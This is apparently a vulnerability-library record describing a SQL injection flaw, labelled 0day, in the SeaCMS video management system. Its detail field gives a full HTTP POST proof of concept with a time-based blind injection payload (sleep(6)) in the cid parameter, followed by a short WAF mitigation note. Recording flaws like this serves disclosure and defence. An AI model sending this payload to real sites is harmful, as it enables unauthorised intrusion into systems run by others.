vendor = "海洋"
name = "SeaCMS海洋影视管理系统index.php存在SQL注入漏洞"
type = "SQL注入"
version = "未知"
path = "/js/player/dmplayer/dmku/index.php?ac=edit"
detail = "POST /js/player/dmplayer/dmku/index.php?ac=edit HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 Accept-Ldwk: bG91ZG9uZ3dlbmt1 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 56 cid=(select(1)from(select(sleep(6)))x)&text=1&color=1"
fix = "WAF封禁路路径，等待发布补丁"
date = "0826"
label = "0day"
